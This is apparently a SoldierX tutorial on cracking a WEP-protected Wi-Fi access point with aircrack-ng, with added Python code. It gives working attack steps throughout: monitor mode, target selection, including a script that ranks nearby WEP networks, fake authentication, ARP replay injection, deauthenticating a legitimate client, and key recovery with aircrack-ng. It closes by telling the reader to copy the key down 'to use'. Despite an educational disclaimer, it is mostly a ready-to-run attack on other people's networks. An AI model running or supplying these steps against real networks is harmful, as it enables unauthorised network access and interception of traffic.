Linux CMD experience
Backtrack 4 R2 or Ubuntu 7.10 + patched WiFi Drivers + Aircrack-ng suite
common sense
The information in this tutorial is for educational and informational purposes only; use it at your own risk. Soldierx.com, its members, crew, and affiliates cannot be held responsible for the misuse of this information.
WEP encryption is widely regarded as the weakest method of securing a wireless access point in the history of WiFi since wireless encryption standards began being developed. The main reason is the way it uses the RC4 stream cipher: every frame carries a 24-bit initialization vector (IV) in cleartext, and that IV is prepended to the shared key to seed the cipher. The IV space is small enough that IVs repeat on a busy network, and a statistically significant fraction of IVs are "weak" in that the first keystream bytes they produce leak information about the key bytes, so with enough captured frames the key falls out of a statistical analysis rather than a brute-force search. (The 32-bit CRC at the end of each frame, the ICV, is an integrity check value, not the IV; the two are often confused.) How many packets you need depends on the attack: figures commonly quoted for the older FMS/KoreK statistical attacks are around 200 thousand to 500 thousand captured IVs for 64-bit and 128-bit keys respectively, while the PTW attack that recent aircrack-ng versions use by default needs far fewer, on the order of tens of thousands.
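To make the mechanism above concrete, here is a small Python model of WEP's use of RC4. It is an added illustration for this tutorial, not code from aircrack-ng: the 40-bit key, the IVs and the ARP payloads are constructed, and only the LLC/SNAP and fixed ARP header bytes in ARP_PREFIX are taken from the real protocol. It shows that one guessable plaintext under an IV gives away that IV's keystream, that two frames sharing an IV leak the XOR of their plaintexts, and that the 24-bit IV space repeats after only a few thousand random IVs.

```python
"""WEP as the attack exploits it: a 24-bit cleartext IV is prepended to the
shared key to seed RC4, so the keystream repeats whenever the IV repeats, and
one guessable plaintext under an IV hands over that IV's keystream.
Added illustration, not aircrack-ng code; key, IVs and frames are constructed."""
import random
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus PRGA: return `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV(3, cleartext) || key-id byte || RC4(IV||key)(pt || ICV).
    ICV is CRC-32 of the plaintext, little-endian, as 802.11 WEP does it."""
    assert len(iv) == 3 and len(wep_key) in (5, 13)      # 64- or 128-bit WEP
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + b"\x00" + xor(plaintext + icv, rc4(iv + wep_key, len(plaintext) + 4))


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Return (plaintext, icv_ok). The receiver reads the IV straight off the frame."""
    iv, body = frame[:3], frame[4:]
    pt_icv = xor(body, rc4(iv + wep_key, len(body)))
    pt, icv = pt_icv[:-4], pt_icv[-4:]
    return pt, struct.unpack("<I", icv)[0] == (zlib.crc32(pt) & 0xFFFFFFFF)


# LLC/SNAP header followed by the fixed ARP fields (hw type, proto, lengths,
# opcode=request): every encrypted ARP request starts with these 16 bytes,
# which is why ARP frames make such good known plaintext.
ARP_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    """Attacker view: keystream[:n] = ciphertext[:n] XOR known_plaintext[:n]."""
    return xor(frame[4:4 + len(known)], known)


def xor_of_plaintexts(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under one IV share a keystream, so C1 XOR C2 = P1 XOR P2
    (over data and ICV alike)."""
    assert frame_a[:3] == frame_b[:3], "needs an IV collision"
    n = min(len(frame_a), len(frame_b)) - 4
    return xor(frame_a[4:4 + n], frame_b[4:4 + n])


def frames_until_iv_repeat(seed: int = 1) -> int:
    """Frames with random IVs until the 24-bit IV space yields its first repeat
    (birthday bound: a few thousand, not millions)."""
    rng = random.Random(seed)
    seen = set()
    while True:
        iv = rng.getrandbits(24)
        if iv in seen:
            return len(seen) + 1
        seen.add(iv)


def demo():
    key = bytes.fromhex("0123456789")                    # constructed 40-bit key
    iv = b"\x00\x00\x01"                                 # same IV on both frames
    arp1 = ARP_PREFIX + bytes.fromhex("001122334455c0a80101" "000000000000c0a80102")
    arp2 = ARP_PREFIX + bytes.fromhex("00aabbccddeec0a80105" "000000000000c0a80102")
    f1, f2 = wep_encrypt(key, iv, arp1), wep_encrypt(key, iv, arp2)
    ks = keystream_from_known_plaintext(f1, ARP_PREFIX)
    return {
        "roundtrip_ok": wep_decrypt(key, f1) == (arp1, True),
        "keystream_recovered": ks == rc4(iv + key, len(ARP_PREFIX)),
        "iv_reuse_leaks": xor_of_plaintexts(f1, f2)[:len(arp1)] == xor(arp1, arp2),
        "frames_to_repeat": frames_until_iv_repeat(),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The keystream recovery is the building block behind the ARP replay attack later in this tutorial: because the attacker already knows the first 16 bytes of any ARP request, every replayed request that the AP re-encrypts under a fresh IV hands over a fresh IV/keystream pair, and the statistical attacks work on exactly that collection.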
***NOTE***
**This Tutorial will cover a basic WEP crack
**It is by no means exhaustive and is meant for
**A jumping off point, from here I send you to Google
**The place where I first got my information.
**********
***ALL COMMANDS LISTED IN THIS TUTORIAL ARE BEING RUN FROM THE root ACCOUNT ON THE MACHINE. IF YOU ARE NOT RUNNING BACKTRACK OR YOU BUILT YOUR OWN SYSTEM YOU NEED TO LOG IN AS ROOT OR sudo EACH COMMAND***
The first step in any cracker's attempt at a WiFi access point is to pick a target. Start by running airmon-ng with no arguments to list any and all available wireless adapters and the driver each one uses.
Then put your adapter into monitor mode with airmon-ng start (adapter name: ath0, wlan0, wlan1, etc.). Monitor mode (not the same thing as promiscuous mode on a wired card) lets the adapter receive every 802.11 frame on the channel, including ARP traffic between other clients and the access point, without being associated to anything. With a patched driver it also allows packet injection, that is, transmitting crafted frames into the network to get a response from the access point. airmon-ng prints the name of the monitor interface it created; with mac80211 drivers this is typically mon0, while older madwifi drivers use an athN interface directly.
The next command to run is airodump-ng (monitor interface: mon0, ath0, etc.). This lists every access point the card can hear, one row per BSSID, and lets you choose one. You will want to pick one with a strong signal. Check the PWR column while the program is running: the value is the received signal strength in dBm (the power ratio in decibels of the measured power referenced to one milliwatt), so it is negative and closer to zero means stronger. -56 is a much stronger signal than -86. A PWR of -1 means the driver does not report signal strength at all, not that the signal is strong.
Once you have selected your target, make note of its BSSID, channel, and how fast its #Data counter climbs. A reasonable amount of data received (80-120 frames without injection, often more) is another good indicator of an access point worth cracking, since it means there are associated clients generating the ARP traffic the replay attack needs. Then restart airodump-ng locked to that target and writing to disk: airodump-ng -w filename --channel (channel of target) --bssid (BSSID or MAC address of target) (interface to capture on: mon0, ath0, whatever airmon-ng gave you as the monitor mode interface, typically mon0). Locking the channel matters: an adapter that keeps hopping misses most of the target's frames. airodump-ng appends a counter to the output name, so the capture lands in filename-01.cap.
Example (placeholder values): airodump-ng -w capture --channel 6 --bssid 00:11:22:33:44:55 mon0
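For the target selection just described, here is an added Python helper (not part of the original tutorial or of aircrack-ng) that reads the CSV airodump-ng writes next to its .cap file (filename-01.csv), keeps the WEP networks, and orders them by the rules above: enough data frames first, then PWR closest to zero, with PWR -1 (driver reports no signal) ranked last. It also assembles the locked-channel capture command for the chosen target. The sample CSV is constructed in airodump-ng's column layout; the field positions are an assumption based on that layout, so check them against a real filename-01.csv before relying on it.

```python
"""Rank WEP targets from an airodump-ng CSV and build the capture command.
Added helper for this tutorial, not aircrack-ng code. SAMPLE_CSV is a
constructed file in airodump-ng's column layout (assumed, verify locally)."""
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-01-01 10:00:00, 2011-01-01 10:05:00,  6,  54, WEP , WEP, OPN, -56,  120,  95,   0.  0.  0.  0,   7, homenet, 
00:11:22:33:44:66, 2011-01-01 10:00:00, 2011-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -40,  300, 1500,   0.  0.  0.  0,   6, office, 
00:11:22:33:44:77, 2011-01-01 10:00:00, 2011-01-01 10:05:00,  1,  11, WEP , WEP, OPN, -86,   40,  12,   0.  0.  0.  0,   5, linksys, 
00:11:22:33:44:88, 2011-01-01 10:00:00, 2011-01-01 10:05:00,  3,  54, WEP , WEP, OPN,  -1,   10, 200,   0.  0.  0.  0,   4, cafe, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
aa:bb:cc:dd:ee:01, 2011-01-01 10:00:00, 2011-01-01 10:05:00, -60, 50, 00:11:22:33:44:55, 
"""


def parse_access_points(text: str):
    """Parse the access-point section (everything before the blank line that
    introduces the station list). Column indexes assume airodump's layout:
    0 BSSID, 3 channel, 5 Privacy, 8 Power, 10 # IV (data frames), 13 ESSID."""
    ap_section = text.replace("\r\n", "\n").strip().split("\n\n", 1)[0]
    rows = csv.reader(io.StringIO(ap_section), skipinitialspace=True)
    next(rows)                                   # header line
    aps = []
    for row in rows:
        if len(row) < 14:                        # truncated or stray line
            continue
        aps.append({
            "bssid": row[0].strip(),
            "channel": int(row[3]),
            "privacy": row[5].strip(),           # "WEP " carries a trailing space
            "power": int(row[8]),
            "data": int(row[10]),
            "essid": row[13].strip(),
        })
    return aps


def rank_wep_targets(aps, min_data: int = 80):
    """WEP networks only, best first: those with at least `min_data` data
    frames (clients generating traffic) ahead of idle ones; within each group
    PWR closest to zero wins; PWR -1 means no signal reporting, so it goes last."""
    wep = [ap for ap in aps if ap["privacy"].startswith("WEP")]
    return sorted(wep, key=lambda ap: (ap["data"] < min_data,
                                       ap["power"] == -1,
                                       -ap["power"]))


def capture_command(ap, iface: str = "mon0", prefix: str = "capture"):
    """argv for the locked-channel capture; the file to crack will be prefix-01.cap."""
    return ["airodump-ng", "-w", prefix, "--channel", str(ap["channel"]),
            "--bssid", ap["bssid"], iface]


if __name__ == "__main__":
    for ap in rank_wep_targets(parse_access_points(SAMPLE_CSV)):
        print(f'{ap["bssid"]}  ch {ap["channel"]:2d}  PWR {ap["power"]:4d}  '
              f'#Data {ap["data"]:5d}  {ap["essid"]}')
    print(" ".join(capture_command(rank_wep_targets(parse_access_points(SAMPLE_CSV))[0])))
```

On a real run, point parse_access_points at the contents of filename-01.csv from an unlocked airodump-ng session; the WPA2 row in the sample is there to show it is filtered out, since nothing in this tutorial applies to it.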
At this stage open a tab in your console window for a separate session and run aireplay-ng -1 0 -a (BSSID of target) (interface). This is a fake authentication attack: it associates your card with the access point as a client, which it must be before the AP will accept the packets you inject, and it needs no key because WEP open-system authentication never checks one. A successful run ends with the line "Association successful :-)". If it times out or you are deauthenticated immediately, check that the card is on the target's channel and that the source MAC you give with -h (if any) matches the card's real MAC, since some drivers drop injected frames with a foreign source address.
Then run aireplay-ng -3 -b (BSSID of target) (interface). This command starts an ARP request replay attack: aireplay-ng waits for an ARP request from a legitimate client, then retransmits it to the access point over and over. The AP answers each copy with a reply encrypted under a new IV, which is what stimulates the gathering of the data you need to crack the access point. If no client ever sends an ARP request the ARP counter stays at zero and nothing is gained; deauthenticating an associated client (aireplay-ng -0) usually makes it send one as it reconnects.
Once it is working you should see the #Data column in the capture window climb by hundreds of frames per second, and aireplay-ng's own status line reports how many packets it has read, how many of those were ARP requests, and how many packets it has sent.
Open a third console window and enter aircrack-ng filename-01.cap (add -b (BSSID of target) if the capture contains more than one network). aircrack-ng attempts a crack with what you have captured so far; if it does not succeed it keeps reading the growing capture file and retries at regular intervals as more IVs arrive. When the crack succeeds you will know it by a line beginning KEY FOUND! followed by the key in hex (and as ASCII if it is printable).
This screen confirms that you have successfully cracked the key, and you can copy it down to use or test. You can back up the .cap files to a flash drive and crack them again at a later date if you lose the key, though if the access point's key changes you will have to capture and crack it again.
This is all that is really needed to know to crack a WEP encrypted access point.